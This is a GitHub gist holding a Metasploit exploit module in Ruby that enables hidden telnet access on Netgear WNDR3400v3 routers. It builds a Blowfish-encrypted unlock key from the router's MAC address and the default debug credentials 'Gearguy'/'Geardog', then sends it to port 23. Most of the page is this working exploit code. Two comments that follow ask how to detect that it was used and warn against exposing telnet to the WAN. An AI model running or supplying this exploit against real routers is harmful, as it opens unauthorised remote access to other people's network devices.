Skip to content

Instantly share code, notes, and snippets.

@phikshun
Created March 18, 2014 23:49
Show Gist options
  • Star 4 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save phikshun/9632525 to your computer and use it in GitHub Desktop.
Save phikshun/9632525 to your computer and use it in GitHub Desktop.
Netgear Telnet Enabler
require 'msf/core'
require 'crypt/blowfish' # sorry, openssl is limited to 16-byte key size :(
# add gem 'crypt', '1.1.4' to Gemfile
module ::Crypt
class Blowfish
def setup_blowfish()
@sBoxes = Array.new(4) { |i| INITIALSBOXES[i].clone }
@pArray = INITIALPARRAY.clone
keypos = 0
0.upto(17) { |i|
data = 0
4.times {
data = ((data << 8) | @key[keypos].ord) % ULONG # minor bug fix to the 1.1.4 version (add .ord for 1.9 compat)
keypos = (keypos.next) % @key.length
}
@pArray[i] = (@pArray[i] ^ data) % ULONG
}
l = 0
r = 0
0.step(17, 2) { |i|
l, r = encrypt_pair(l, r)
@pArray[i] = l
@pArray[i+1] = r
}
0.upto(3) { |i|
0.step(255, 2) { |j|
l, r = encrypt_pair(l, r)
@sBoxes[i][j] = l
@sBoxes[i][j+1] = r
}
}
end
end
end
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info={})
super(update_info(info,
'Name' => 'NetGear Telnet Enabler',
'Description' => %q{
This module enables the telnet service on NetGear routers. Successfully tested on
a NetGear WNDR34000v3.
},
'Author' => [ 'phikshun' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 14774 $',
'References' =>
[
[ 'NA', 'NA' ],
],
'Platform' => 'linux',
'Privileged' => false,
'Targets' =>
[
[ 'Netgear WNDR3400v3', { }, ],
],
'DefaultTarget' => 0,
'DisclosureDate' => '0 day, yo'))
register_options(
[
Opt::RPORT(23),
OptString.new('MAC', [ true, "The MAC Address of the router LAN interface", nil ]),
OptString.new('USER', [ true, "The debug username of the router", 'Gearguy' ]),
OptString.new('PASS', [ true, "The debug password of the router", 'Geardog' ])
], self.class)
end
def generate_key(mac, username, password = '')
mac = mac.split(/[\.\-:]/).map { |b| "%02x" % b.to_i(16) }.join('') if mac =~ /[\.\-:]/
mac.upcase!
just_mac = mac.ljust(0x10, "\x00")
just_username = username.ljust(0x10, "\x00")
just_password = password.ljust(0x10, "\x00")
cleartext = (just_mac + just_username + just_password).ljust(0x70, "\x00")
md5_key = OpenSSL::Digest::MD5.digest(cleartext)
payload = (md5_key + cleartext).ljust(0x80, "\x00").unpack('V*').pack('N*')
blowfish = Crypt::Blowfish.new("AMBIT_TELNET_ENABLE+" + password)
ciphertext = payload.scan(/.{8}/).map { |b| blowfish.encrypt_block(b) }.join('')
ciphertext.unpack('V*').pack('N*')
end
def exploit
connect
sock.put(generate_key(datastore['MAC'], datastore['USER'], datastore['PASS']))
disconnect
print_status("Unlock key sent -- try telneting to #{rhost}")
end
end
@neil-s
Copy link

neil-s commented Apr 6, 2014

How can I check my router to see if anyone has run this on it? If I simply try to telnet into it from outside, and see a login banner, is that enough to say that telnet has been made responsive on it?

@FrostbittenKing
Copy link

You should absolutely not make this available on the WAN side. You're asking for troubles, and yes if you get greeted with the banner, and you didn't enable the telnetd, it's safe to assume some $evilguy enabled it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment